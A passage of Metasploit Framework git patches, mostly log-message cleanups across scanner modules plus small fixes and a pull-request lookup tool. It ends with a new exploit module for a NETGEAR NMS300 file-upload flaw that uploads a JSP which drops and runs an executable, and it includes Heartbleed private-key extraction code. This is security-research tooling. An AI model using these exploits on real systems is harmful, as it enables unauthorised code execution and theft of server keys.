#{tls_callback}") + vprint_status("Trying to start SSL via #{tls_callback}") res = self.send(TLS_CALLBACKS[tls_callback]) if res.nil? - vprint_error("#{peer} - STARTTLS failed...") + vprint_error("STARTTLS failed...") return nil end end - vprint_status("#{peer} - Sending Client Hello...") + vprint_status("Sending Client Hello...") sock.put(client_hello) server_resp = get_server_hello if server_resp.nil? - vprint_error("#{peer} - Server Hello Not Found") + vprint_error("Server Hello Not Found") return nil end @@ -442,11 +442,11 @@ class Metasploit3 < Msf::Auxiliary connect_result = establish_connect return if connect_result.nil? - vprint_status("#{peer} - Sending Heartbeat...") + vprint_status("Sending Heartbeat...") sock.put(heartbeat_request(heartbeat_length)) hdr = get_data(SSL_RECORD_HEADER_SIZE) if hdr.nil? || hdr.empty? - vprint_error("#{peer} - No Heartbeat response...") + vprint_error("No Heartbeat response...") disconnect return end @@ -470,19 +470,19 @@ class Metasploit3 < Msf::Auxiliary else msg = 'Unknown error' end - vprint_error("#{peer} - #{msg}") + vprint_error("#{msg}") disconnect return end unless type == HEARTBEAT_RECORD_TYPE && version == TLS_VERSION[tls_version] - vprint_error("#{peer} - Unexpected Heartbeat response header (#{to_hex_string(hdr)})") + vprint_error("Unexpected Heartbeat response header (#{to_hex_string(hdr)})") disconnect return end heartbeat_data = get_data(heartbeat_length) - vprint_status("#{peer} - Heartbeat response, #{heartbeat_data.length} bytes") + vprint_status("Heartbeat response, #{heartbeat_data.length} bytes") disconnect heartbeat_data end @@ -491,11 +491,11 @@ class Metasploit3 < Msf::Auxiliary def loot_and_report(heartbeat_data) unless heartbeat_data - vprint_error("#{peer} - Looks like there isn't leaked information...") + vprint_error("Looks like there isn't leaked information...") return end - print_good("#{peer} - Heartbeat response with leak") + print_good("Heartbeat response with leak") report_vuln({ :host => rhost, :port => rport, @@ -519,7 +519,7 @@ class Metasploit3 < Msf::Auxiliary nil, 'OpenSSL Heartbleed server memory' ) - print_status("#{peer} - Heartbeat data stored in #{path}") + print_status("Heartbeat data stored in #{path}") end # Convert non-printable characters to periods @@ -536,7 +536,7 @@ class Metasploit3 < Msf::Auxiliary end # Show abbreviated data - vprint_status("#{peer} - Printable info leaked:\n#{abbreviated_data}") + vprint_status("Printable info leaked:\n#{abbreviated_data}") end @@ -550,24 +550,24 @@ class Metasploit3 < Msf::Auxiliary disconnect return if connect_result.nil? - print_status("#{peer} - Scanning for private keys") + print_status("Scanning for private keys") count = 0 - print_status("#{peer} - Getting public key constants...") + print_status("Getting public key constants...") n, e = get_ne if n.nil? || e.nil? - print_error("#{peer} - Failed to get public key, aborting.") + print_error("Failed to get public key, aborting.") end - vprint_status("#{peer} - n: #{n}") - vprint_status("#{peer} - e: #{e}") - print_status("#{peer} - #{Time.now.getutc} - Starting.") + vprint_status("n: #{n}") + vprint_status("e: #{e}") + print_status("#{Time.now.getutc} - Starting.") max_keytries.times { # Loop up to MAX_KEYTRIES times, looking for keys if count % status_every == 0 - print_status("#{peer} - #{Time.now.getutc} - Attempt #{count}...") + print_status("#{Time.now.getutc} - Attempt #{count}...") end bleedresult = bleed @@ -577,7 +577,7 @@ class Metasploit3 < Msf::Auxiliary unless p.nil? || q.nil? key = key_from_pqe(p, q, e) - print_good("#{peer} - #{Time.now.getutc} - Got the private key") + print_good("#{Time.now.getutc} - Got the private key") print_status(key.export) path = store_loot( @@ -588,18 +588,18 @@ class Metasploit3 < Msf::Auxiliary nil, 'OpenSSL Heartbleed Private Key' ) - print_status("#{peer} - Private key stored in #{path}") + print_status("Private key stored in #{path}") return end count += 1 } - print_error("#{peer} - Private key not found. You can try to increase MAX_KEYTRIES and/or HEARTBEAT_LENGTH.") + print_error("Private key not found. You can try to increase MAX_KEYTRIES and/or HEARTBEAT_LENGTH.") end # Returns the N and E params from the public server certificate def get_ne unless @cert - print_error("#{peer} - No certificate found") + print_error("No certificate found") return end @@ -619,7 +619,7 @@ class Metasploit3 < Msf::Auxiliary # Only try candidates that have a chance... q, rem = n / can if rem == 0 && can != n - vprint_good("#{peer} - Found factor at offset #{x.to_s(16)}") + vprint_good("Found factor at offset #{x.to_s(16)}") p = can return p, q end @@ -692,7 +692,7 @@ class Metasploit3 < Msf::Auxiliary hdr = get_data(SSL_RECORD_HEADER_SIZE) unless hdr - vprint_error("#{peer} - No SSL record header received after #{response_timeout} seconds...") + vprint_error("No SSL record header received after #{response_timeout} seconds...") return nil end @@ -700,7 +700,7 @@ class Metasploit3 < Msf::Auxiliary data = get_data(len) unless data - vprint_error("#{peer} - No SSL record contents received after #{response_timeout} seconds...") + vprint_error("No SSL record contents received after #{response_timeout} seconds...") return nil end diff --git a/modules/auxiliary/voip/cisco_cucdm_call_forward.rb b/modules/auxiliary/voip/cisco_cucdm_call_forward.rb index b3de7313ce..54bf04b7c3 100644 --- a/modules/auxiliary/voip/cisco_cucdm_call_forward.rb +++ b/modules/auxiliary/voip/cisco_cucdm_call_forward.rb @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary uri = normalize_uri(target_uri.to_s) mac = datastore["MAC"] - print_status("#{peer} - Getting fintnumbers and display names of the IP phone") + print_status("Getting fintnumbers and display names of the IP phone") res = send_request_cgi( { @@ -68,7 +68,7 @@ class Metasploit3 < Msf::Auxiliary }) unless res && res.code == 200 && res.body && res.body.to_s =~ /fintnumber/ - print_error("#{peer} - Target appears not vulnerable!") + print_error("Target appears not vulnerable!") print_status("#{res}") return [] end @@ -87,7 +87,7 @@ class Metasploit3 < Msf::Auxiliary end lines.size.times do |i| - print_status("#{peer} - Display Name: #{lines[i]}, Fintnumber: #{fint_numbers[i]}") + print_status("Display Name: #{lines[i]}, Fintnumber: #{fint_numbers[i]}") end fint_numbers @@ -106,13 +106,13 @@ class Metasploit3 < Msf::Auxiliary end if fint_numbers.empty? - print_error("#{peer} - FINTNUMBER required to forward calls") + print_error("FINTNUMBER required to forward calls") return end fint_numbers.each do |fintnumber| - print_status("#{peer} - Sending call forward request for #{fintnumber}") + print_status("Sending call forward request for #{fintnumber}") send_request_cgi( { @@ -138,9 +138,9 @@ class Metasploit3 < Msf::Auxiliary }) if res && res.body && res.body && res.body.to_s =~ /CFA/ - print_good("#{peer} - Call forwarded successfully for #{fintnumber}") + print_good("Call forwarded successfully for #{fintnumber}") else - print_status("#{peer} - Call forward failed.") + print_status("Call forward failed.") end end end diff --git a/modules/auxiliary/voip/cisco_cucdm_speed_dials.rb b/modules/auxiliary/voip/cisco_cucdm_speed_dials.rb index ae40518cd1..cccf08529f 100644 --- a/modules/auxiliary/voip/cisco_cucdm_speed_dials.rb +++ b/modules/auxiliary/voip/cisco_cucdm_speed_dials.rb @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Auxiliary if res && res.code == 200 && res.body && res.body.to_s =~ /Speed [D|d]ial/ return Exploit::CheckCode::Vulnerable, res else - print_error("#{peer} - Target appears not vulnerable!") + print_error("Target appears not vulnerable!") return Exploit::CheckCode::Safe, res end end @@ -98,17 +98,17 @@ class Metasploit3 < Msf::Auxiliary info << "Name: #{names[i].split(":")[1]}, " info << "Telephone: #{phones[i]}" - print_good("#{peer} - #{info}") + print_good("#{info}") end else - print_status("#{peer} - No Speed Dial detected") + print_status("No Speed Dial detected") end end def list mac = datastore['MAC'] - print_status("#{peer} - Getting Speed Dials of the IP phone") + print_status("Getting Speed Dials of the IP phone") vars_get = { 'device' => "SEP#{mac}" } @@ -123,7 +123,7 @@ class Metasploit3 < Msf::Auxiliary position = datastore['POSITION'] telno = datastore['TELNO'] - print_status("#{peer} - Adding Speed Dial to the IP phone") + print_status("Adding Speed Dial to the IP phone") vars_get = { 'name' => "#{name}", 'telno' => "#{telno}", @@ -134,11 +134,11 @@ class Metasploit3 < Msf::Auxiliary status, res = send_rcv('phonespeedialadd.cgi', vars_get) if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Added/ - print_good("#{peer} - Speed Dial #{position} is added successfully") + print_good("Speed Dial #{position} is added successfully") elsif res && res.body && res.body.to_s =~ /exist/ - print_error("#{peer} - Speed Dial is exist, change the position or choose modify!") + print_error("Speed Dial is exist, change the position or choose modify!") else - print_error("#{peer} - Speed Dial couldn't add!") + print_error("Speed Dial couldn't add!") end end @@ -146,7 +146,7 @@ class Metasploit3 < Msf::Auxiliary mac = datastore['MAC'] position = datastore['POSITION'] - print_status("#{peer} - Deleting Speed Dial of the IP phone") + print_status("Deleting Speed Dial of the IP phone") vars_get = { 'entry' => "#{position}", @@ -156,9 +156,9 @@ class Metasploit3 < Msf::Auxiliary status, res = send_rcv('phonespeeddialdelete.cgi', vars_get) if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Deleted/ - print_good("#{peer} - Speed Dial #{position} is deleted successfully") + print_good("Speed Dial #{position} is deleted successfully") else - print_error("#{peer} - Speed Dial is not found!") + print_error("Speed Dial is not found!") end end @@ -168,7 +168,7 @@ class Metasploit3 < Msf::Auxiliary position = datastore['POSITION'] telno = datastore['TELNO'] - print_status("#{peer} - Deleting Speed Dial of the IP phone") + print_status("Deleting Speed Dial of the IP phone") vars_get = { 'entry' => "#{position}", @@ -178,8 +178,8 @@ class Metasploit3 < Msf::Auxiliary status, res = send_rcv('phonespeeddialdelete.cgi', vars_get) if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Deleted/ - print_good("#{peer} - Speed Dial #{position} is deleted successfully") - print_status("#{peer} - Adding Speed Dial to the IP phone") + print_good("Speed Dial #{position} is deleted successfully") + print_status("Adding Speed Dial to the IP phone") vars_get = { 'name' => "#{name}", @@ -192,14 +192,14 @@ class Metasploit3 < Msf::Auxiliary status, res = send_rcv('phonespeedialadd.cgi', vars_get) if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Added/ - print_good("#{peer} - Speed Dial #{position} is added successfully") + print_good("Speed Dial #{position} is added successfully") elsif res && res.body =~ /exist/ - print_error("#{peer} - Speed Dial is exist, change the position or choose modify!") + print_error("Speed Dial is exist, change the position or choose modify!") else - print_error("#{peer} - Speed Dial couldn't add!") + print_error("Speed Dial couldn't add!") end else - print_error("#{peer} - Speed Dial is not found!") + print_error("Speed Dial is not found!") end end end From 47c0a3b4a71418c4b80b16119d7188cfa918aa73 Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Mon, 1 Feb 2016 16:21:10 -0600 Subject: [PATCH 258/686] Get some stragglers that had a different format --- modules/auxiliary/admin/atg/atg_client.rb | 8 ++++---- modules/auxiliary/scanner/dlsw/dlsw_leak_capture.rb | 12 ++++++------ modules/auxiliary/scanner/rdp/ms12_020_check.rb | 4 ++-- modules/auxiliary/scanner/rsync/modules_list.rb | 2 +- modules/auxiliary/scanner/ssh/ssh_version.rb | 8 ++++---- 5 files changed, 17 insertions(+), 17 deletions(-) diff --git a/modules/auxiliary/admin/atg/atg_client.rb b/modules/auxiliary/admin/atg/atg_client.rb index 5560f2f76d..357338b434 100644 --- a/modules/auxiliary/admin/atg/atg_client.rb +++ b/modules/auxiliary/admin/atg/atg_client.rb @@ -225,9 +225,9 @@ class Metasploit3 < Msf::Auxiliary when 'SET_TANK_NAME' # send the set tank name command to change the tank name(s) if tank_number == 0 - vprint_status("#{peer} -- setting all tank names to #{tank_name}") + vprint_status("Setting all tank names to #{tank_name}") else - vprint_status("#{peer} -- setting tank ##{tank_number}'s name to #{tank_name}") + vprint_status("Setting tank ##{tank_number}'s name to #{tank_name}") end request = "#{action.opts[protocol_opt_name]}#{format('%02d', tank_number)}#{tank_name}\n" sock.put(request) @@ -237,7 +237,7 @@ class Metasploit3 < Msf::Auxiliary # send an inventory probe to show that it succeeded inventory_probe = "#{actions.find { |a| a.name == 'INVENTORY' }.opts[protocol_opt_name]}\n" inventory_response = get_response(inventory_probe) - message = "#{peer} #{protocol} #{action.opts['Description']}:\n#{inventory_response}" + message = "#{protocol} #{action.opts['Description']}:\n#{inventory_response}" if inventory_response.include?(tank_name) print_good message else @@ -245,7 +245,7 @@ class Metasploit3 < Msf::Auxiliary end else response = get_response("#{action.opts[protocol_opt_name]}\n") - print_good("#{peer} #{protocol} #{action.opts['Description']}:\n#{response}") + print_good("#{protocol} #{action.opts['Description']}:\n#{response}") end ensure disconnect diff --git a/modules/auxiliary/scanner/dlsw/dlsw_leak_capture.rb b/modules/auxiliary/scanner/dlsw/dlsw_leak_capture.rb index 405e6e1851..21e6d9ffb1 100644 --- a/modules/auxiliary/scanner/dlsw/dlsw_leak_capture.rb +++ b/modules/auxiliary/scanner/dlsw/dlsw_leak_capture.rb @@ -51,14 +51,14 @@ class Metasploit3 < Msf::Auxiliary # Called when using check def check_host(_ip) - print_status("#{peer}: Checking for DLSw information disclosure (CVE-2014-7992)") + print_status("Checking for DLSw information disclosure (CVE-2014-7992)") response = get_response if response.blank? - vprint_status("#{peer}: no response") + vprint_status("No response") Exploit::CheckCode::Safe elsif response[0..1] == "\x31\x48" || response[0..1] == "\x32\x48" - vprint_good("#{peer}: Detected DLSw protocol") + vprint_good("Detected DLSw protocol") report_service( host: rhost, port: rport, @@ -68,7 +68,7 @@ class Metasploit3 < Msf::Auxiliary # TODO: check that response has something that truly indicates it is vulnerable # and not simply that it responded unless response[18..72].scan(/\x00/).length == 54 - print_good("#{peer}: vulnerable to DLSw information disclosure; leaked #{response.length} bytes") + print_good("Vulnerable to DLSw information disclosure; leaked #{response.length} bytes") report_vuln( host: rhost, port: rport, @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Auxiliary Exploit::CheckCode::Vulnerable end else - vprint_status("#{peer}: #{response.size}-byte response didn't contain any leaked data") + vprint_status("#{response.size}-byte response didn't contain any leaked data") Exploit::CheckCode::Safe end end @@ -105,6 +105,6 @@ class Metasploit3 < Msf::Auxiliary 'DLSw_leaked_data', 'DLSw packet memory leak' ) - print_status("#{peer}: DLSw leaked data stored in #{path}") + print_status("DLSw leaked data stored in #{path}") end end diff --git a/modules/auxiliary/scanner/rdp/ms12_020_check.rb b/modules/auxiliary/scanner/rdp/ms12_020_check.rb index d9fca848d7..f9174649d9 100644 --- a/modules/auxiliary/scanner/rdp/ms12_020_check.rb +++ b/modules/auxiliary/scanner/rdp/ms12_020_check.rb @@ -42,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary def check_rdp # code to check if RDP is open or not - vprint_status("#{peer} Verifying RDP protocol...") + vprint_status("Verifying RDP protocol...") # send connection sock.put(connection_request) @@ -128,7 +128,7 @@ class Metasploit3 < Msf::Auxiliary def check_rdp_vuln # check if rdp is open unless check_rdp - vprint_status "#{peer} Could not connect to RDP." + vprint_status "Could not connect to RDP." return Exploit::CheckCode::Unknown end diff --git a/modules/auxiliary/scanner/rsync/modules_list.rb b/modules/auxiliary/scanner/rsync/modules_list.rb index 547e102a79..9bdfaaf4f5 100644 --- a/modules/auxiliary/scanner/rsync/modules_list.rb +++ b/modules/auxiliary/scanner/rsync/modules_list.rb @@ -175,7 +175,7 @@ class Metasploit3 < Msf::Auxiliary begin modules_metadata = rsync_list rescue *HANDLED_EXCEPTIONS => e - vprint_error("#{peer} -- error while listing modules: #{e}") + vprint_error("Error while listing modules: #{e}") return ensure disconnect diff --git a/modules/auxiliary/scanner/ssh/ssh_version.rb b/modules/auxiliary/scanner/ssh/ssh_version.rb index 5371196d34..885d224e51 100644 --- a/modules/auxiliary/scanner/ssh/ssh_version.rb +++ b/modules/auxiliary/scanner/ssh/ssh_version.rb @@ -50,7 +50,7 @@ class Metasploit3 < Msf::Auxiliary resp = sock.get_once(-1, timeout) if ! resp - vprint_warning("#{peer} no response") + vprint_warning("No response") return end @@ -58,7 +58,7 @@ class Metasploit3 < Msf::Auxiliary info = "" if /^SSH-\d+\.\d+-(.*)$/ !~ ident - vprint_warning("#{peer} was not SSH -- #{resp.size} bytes beginning with #{resp[0, 12]}") + vprint_warning("Was not SSH -- #{resp.size} bytes beginning with #{resp[0, 12]}") return end @@ -85,11 +85,11 @@ class Metasploit3 < Msf::Auxiliary end end - print_status("#{peer} SSH server version: #{ident}#{info}") + print_status("SSH server version: #{ident}#{info}") report_service(host: rhost, port: rport, name: 'ssh', proto: 'tcp', info: ident) end rescue Timeout::Error - vprint_warning("#{peer} timed out after #{timeout} seconds. Skipping.") + vprint_warning("Timed out after #{timeout} seconds. Skipping.") ensure disconnect end From b979128a2ecb02eac175f8615cd31412ccb27fe6 Mon Sep 17 00:00:00 2001 From: Chris Higgins <chris@chigs.me> Date: Mon, 1 Feb 2016 17:11:46 -0600 Subject: [PATCH 259/686] Added OSVBD ID thanks to @shipcod3 --- modules/exploits/windows/ftp/pcman_put.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/exploits/windows/ftp/pcman_put.rb b/modules/exploits/windows/ftp/pcman_put.rb index 7062af3f5b..03e0d490ee 100644 --- a/modules/exploits/windows/ftp/pcman_put.rb +++ b/modules/exploits/windows/ftp/pcman_put.rb @@ -26,7 +26,8 @@ class Metasploit4 < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'References' => [ - [ 'EDB', '37731'] + [ 'EDB', '37731'], + [ 'OSVDB', '94624'] ], 'DefaultOptions' => { From b4ed55b4d4db2acee90988213516930ee4fe33d9 Mon Sep 17 00:00:00 2001 From: William Vu <William_Vu@rapid7.com> Date: Tue, 2 Feb 2016 09:56:48 -0600 Subject: [PATCH 260/686] Fix reverse_http{,s} LHOST bind address --- lib/msf/core/handler/reverse_http.rb | 10 +++++++--- 1 file changed, 7 insertions(+), 3 deletions(-) diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb index e3d8b04ef5..cfc80b4fac 100644 --- a/lib/msf/core/handler/reverse_http.rb +++ b/lib/msf/core/handler/reverse_http.rb @@ -67,10 +67,14 @@ module ReverseHttp # # @return [String] def listener_address - if datastore['ReverseListenerBindAddress'].to_s == '' - bindaddr = Rex::Socket.is_ipv6?(datastore['LHOST']) ? '::' : '0.0.0.0' - else + if datastore['ReverseListenerBindAddress'] bindaddr = datastore['ReverseListenerBindAddress'] + else + begin + bindaddr = Rex::Socket.getaddress(datastore['LHOST']) + rescue SocketError + bindaddr = Rex::Socket.is_ipv6?(datastore['LHOST']) ? '::' : '0.0.0.0' + end end bindaddr From 208420d7410bb90c173dde5635a9007c0dff629c Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Tue, 2 Feb 2016 10:02:32 -0600 Subject: [PATCH 261/686] Sort methods --- lib/msf/core/exploit/udp.rb | 25 ++++++++++++------------- 1 file changed, 12 insertions(+), 13 deletions(-) diff --git a/lib/msf/core/exploit/udp.rb b/lib/msf/core/exploit/udp.rb index 2a7eedce31..8b503dc4cd 100644 --- a/lib/msf/core/exploit/udp.rb +++ b/lib/msf/core/exploit/udp.rb @@ -107,17 +107,17 @@ module Exploit::Remote::Udp ## # - # Returns the target host + # Returns the local host for outgoing connections # - def rhost - datastore['RHOST'] + def chost + datastore['CHOST'] end # - # Returns the remote port + # Returns the local port for outgoing connections # - def rport - datastore['RPORT'] + def cport + datastore['CPORT'] end # @@ -135,20 +135,19 @@ module Exploit::Remote::Udp end # - # Returns the local host for outgoing connections + # Returns the target host # - def chost - datastore['CHOST'] + def rhost + datastore['RHOST'] end # - # Returns the local port for outgoing connections + # Returns the remote port # - def cport - datastore['CPORT'] + def rport + datastore['RPORT'] end - protected attr_accessor :udp_sock From d55e68e76baebc763bde2899adcec8bc0541f316 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Tue, 2 Feb 2016 11:25:39 -0600 Subject: [PATCH 262/686] Fix bug in js_obfuscate --- lib/msf/core/exploit/jsobfu.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/jsobfu.rb b/lib/msf/core/exploit/jsobfu.rb index 518c2a0559..73b3ce2b47 100644 --- a/lib/msf/core/exploit/jsobfu.rb +++ b/lib/msf/core/exploit/jsobfu.rb @@ -24,7 +24,7 @@ module Msf # def js_obfuscate(js, opts={}) iterations = (opts[:iterations] || datastore['JsObfuscate']).to_i - identifiers = (opts[:preserved_identifiers] || datastore['JsIdentifiers'] || '').split(',') + identifiers = opts[:preserved_identifiers].blank? ? (datastore['JsIdentifiers'] || '').split(',') : opts[:preserved_identifiers] obfu = ::Rex::Exploitation::JSObfu.new(js) obfu_opts = {} obfu_opts.merge!(iterations: iterations) From 3ff2c98f999567e051b24a3ad56902b9945b931a Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Wed, 3 Feb 2016 16:53:03 -0600 Subject: [PATCH 263/686] Add tool module_pull_requests This tool allows you to find all the rapid7/metasploit-framework pull requests associated with a particular Metasploit module. --- tools/modules/module_pull_requests.rb | 193 ++++++++++++++++++++++++++ 1 file changed, 193 insertions(+) create mode 100644 tools/modules/module_pull_requests.rb diff --git a/tools/modules/module_pull_requests.rb b/tools/modules/module_pull_requests.rb new file mode 100644 index 0000000000..d828c089f1 --- /dev/null +++ b/tools/modules/module_pull_requests.rb @@ -0,0 +1,193 @@ +#!/usr/bin/env ruby + +require 'octokit' +require 'net/http' +require 'nokogiri' +require 'optparse' + +module ModulePullRequestCollector + + class Exception < RuntimeError; end + + class PullRequestFinder + + attr_accessor :git_client + attr_accessor :repository + attr_accessor :branch + attr_accessor :owner + attr_accessor :git_access_token + + def initialize(api_key) + self.owner = 'rapid7' + self.repository = "#{owner}/metasploit-framework" + self.branch = 'master' + self.git_access_token = api_key + self.git_client = Octokit::Client.new(access_token: git_access_token) + end + + # Returns the commit history of a file. + def get_commits_from_file(path) + commits = git_client.commits(repository, branch, path: path) + if commits.empty? + # Possibly the path is wrong. + raise ModulePullRequestCollector::Exception, 'No commits found.' + end + + commits + end + + def get_author(commit) + if commit.author + return commit.author[:login].to_s + end + + '' + end + + def is_author_blacklisted?(commit) + ['tabassassin'].include?(get_author(commit)) + end + + def get_pull_requests_from_commits(commits) + pull_requests = {} + + commits.each do |commit| + next if is_author_blacklisted?(commit) + + pr = get_pull_request_from_commit(commit) + unless pr.empty? + pull_requests[pr[:number]] = pr + end + end + + pull_requests + end + + def get_pull_request_from_commit(commit) + sha = commit.sha + url = URI.parse("https://github.com/#{repository}/branch_commits/#{sha}") + cli = Net::HTTP.new(url.host, url.port) + cli.use_ssl = true + req = Net::HTTP::Get.new(url.request_uri) + res = cli.request(req) + n = Nokogiri::HTML(res.body) + found_pr_link = n.at('li[@class="pull-request"]//a') + + # If there is no PR associated with this commit, it's probably from the SVN days. + return {} unless found_pr_link + + href = found_pr_link.attributes['href'].text + title = found_pr_link.attributes['title'].text + + # Filter out all the pull requests that do not belong to rapid7. + # If this happens, it's probably because the PR was submitted to somebody's fork. + return {} unless /^\/#{owner}\// === href + + { number: href.scan(/\d+$/).flatten.first, title: title } + end + end + + class Client + + attr_accessor :finder + + def initialize(api_key) + self.finder = PullRequestFinder.new(api_key) + end + + def search(module_name) + commits = finder.get_commits_from_file(module_name) + pull_requests = finder.get_pull_requests_from_commits(commits) + puts "Pull request(s) associated with #{module_name}" + pull_requests.each_pair do |number, pr| + puts "##{number} - #{pr[:title]}" + end + end + end + + class OptsParser + + def self.banner + %Q| + This tool collects all the pull requests submitted to rapid7/metasploit-framework for a + particular module. It does not include history from SVN (what Metasploit used to use + before Git). + + Usage: #{__FILE__} [options] + + Usage Example: + #{__FILE__} -k KEY -m modules/exploits/windows/browser/ms13_069_caret.rb + + How to obtain an API key (access token): + 1. Go to github.com. + 2. Go to Settings under your profile. + 3. Click on Personal Access Tokens + 4. Click on Generate new token + 5. Follow the steps on the screen to complete the process. + + | + end + + def self.parse(args) + options = {} + + opts = OptionParser.new do |opts| + opts.banner = banner.strip.gsub(/^[[:blank:]]{4}/, '') + + opts.separator "" + opts.separator "Specific options:" + + opts.on("-k", "-k <key>", "Github Access Token") do |v| + options[:api_key] = v + end + + opts.on("-m", "--module <name>", "Module name") do |v| + options[:module] = v + end + + opts.separator "" + opts.separator "Common options:" + + opts.on_tail("-h", "--help", "Show this message") do + puts opts + exit + end + end + + begin + opts.parse!(args) + rescue OptionParser::InvalidOption + puts "Invalid option, try -h for usage" + exit + end + + if options.empty? + puts "No options specified, try -h for usage" + exit + end + + options + end + end + +end + +if __FILE__ == $PROGRAM_NAME + begin + opts = ModulePullRequestCollector::OptsParser.parse(ARGV) + rescue OptionParser::InvalidOption, OptionParser::MissingArgument => e + puts "#{e.message} (please see -h)" + exit + end + + begin + cli = ModulePullRequestCollector::Client.new(opts[:api_key]) + cli.search(opts[:module]) + rescue ModulePullRequestCollector::Exception => e + $stderr.puts e.message + exit + rescue Interrupt + $stdout.puts + $stdout.puts "Good bye" + end +end From 23fdadd31fb641c5019afda764bfe37b1911af72 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Wed, 3 Feb 2016 16:57:50 -0600 Subject: [PATCH 264/686] chmod +x --- tools/modules/module_pull_requests.rb | 0 1 file changed, 0 insertions(+), 0 deletions(-) mode change 100644 => 100755 tools/modules/module_pull_requests.rb diff --git a/tools/modules/module_pull_requests.rb b/tools/modules/module_pull_requests.rb old mode 100644 new mode 100755 From 1f4324f686fc89063b2e442a0b6e727831f53e0c Mon Sep 17 00:00:00 2001 From: Pedro Ribeiro <pedrib@gmail.com> Date: Thu, 4 Feb 2016 07:54:16 +0800 Subject: [PATCH 265/686] Create file for CERT VU 777024 --- .../exploits/windows/http/netgear_nms_rce.rb | 146 ++++++++++++++++++ 1 file changed, 146 insertions(+) create mode 100644 modules/exploits/windows/http/netgear_nms_rce.rb diff --git a/modules/exploits/windows/http/netgear_nms_rce.rb b/modules/exploits/windows/http/netgear_nms_rce.rb new file mode 100644 index 0000000000..e7db7ee64c --- /dev/null +++ b/modules/exploits/windows/http/netgear_nms_rce.rb @@ -0,0 +1,146 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::EXE + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'NETGEAR ProSafe Network Management System 300 Arbitrary File Upload', + 'Description' => %q{ + Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems. + The application has a file upload vulnerability that can be exploited by an + unauthenticated remote attacker to execute code as the SYSTEM user. + Two servlets are vulnerable, FileUploadController (located at + /lib-1.0/external/flash/fileUpload.do) and FileUpload2Controller (located at /fileUpload.do). + This module exploits the latter, and has been tested with versions 1.5.0.2, 1.4.0.17 and + 1.1.0.13. + }, + 'Author' => + [ + 'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and updated MSF module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2016-1525'], + ['US-CERT-VU', '777024'], + ['URL', 'TODO_GITHUB_URL'], + ['URL', 'TODO_FULLDISC_URL'] + ], + 'DefaultOptions' => { 'WfsDelay' => 5 }, + 'Platform' => 'win', + 'Arch' => ARCH_X86, + 'Privileged' => true, + 'Targets' => + [ + [ 'NETGEAR ProSafe Network Management System 300 / Windows', {} ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Feb 4 2016')) + + register_options( + [ + Opt::RPORT(8080), + OptString.new('TARGETURI', [true, "Application path", '/']) + ], self.class) + end + + + def check + res = send_request_cgi({ + 'uri' => normalize_uri(datastore['TARGETURI'], 'fileUpload.do'), + 'method' => 'GET' + }) + if res && res.code == 405 + return Exploit::CheckCode::Detected + else + return Exploit::CheckCode::Safe + end + end + + + def generate_jsp_payload + exe = generate_payload_exe + base64_exe = Rex::Text.encode_base64(exe) + payload_name = rand_text_alpha(rand(6)+3) + + var_raw = rand_text_alpha(rand(8) + 3) + var_ostream = rand_text_alpha(rand(8) + 3) + var_buf = rand_text_alpha(rand(8) + 3) + var_decoder = rand_text_alpha(rand(8) + 3) + var_tmp = rand_text_alpha(rand(8) + 3) + var_path = rand_text_alpha(rand(8) + 3) + var_proc2 = rand_text_alpha(rand(8) + 3) + + jsp = %Q| + <%@page import="java.io.*"%> + <%@page import="sun.misc.BASE64Decoder"%> + <% + try { + String #{var_buf} = "#{base64_exe}"; + BASE64Decoder #{var_decoder} = new BASE64Decoder(); + byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString()); + + File #{var_tmp} = File.createTempFile("#{payload_name}", ".exe"); + String #{var_path} = #{var_tmp}.getAbsolutePath(); + + BufferedOutputStream #{var_ostream} = + new BufferedOutputStream(new FileOutputStream(#{var_path})); + #{var_ostream}.write(#{var_raw}); + #{var_ostream}.close(); + Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path}); + } catch (Exception e) { + } + %> + | + + jsp = jsp.gsub(/\n/, '') + jsp = jsp.gsub(/\t/, '') + jsp = jsp.gsub(/\x0d\x0a/, "") + jsp = jsp.gsub(/\x0a/, "") + + return jsp + end + + + def exploit + jsp_payload = generate_jsp_payload + + jsp_name = Rex::Text.rand_text_alpha(8+rand(8)) + jsp_full_name = "null" + jsp_name + ".jsp" + post_data = Rex::MIME::Message.new + post_data.add_part(jsp_name, nil, nil, "form-data; name=\"name\"") + post_data.add_part(jsp_payload, + "application/octet-stream", 'binary', + "form-data; name=\"Filedata\"; filename=\"#{Rex::Text.rand_text_alpha(6+rand(10))}.jsp\"") + data = post_data.to_s + + print_status("#{peer} - Uploading payload...") + res = send_request_cgi({ + 'uri' => normalize_uri(datastore['TARGETURI'], 'fileUpload.do'), + 'method' => 'POST', + 'data' => data, + 'ctype' => "multipart/form-data; boundary=#{post_data.bound}" + }) + if res && res.code == 200 && res.body.to_s =~ /{"success":true, "file":"#{jsp_name + 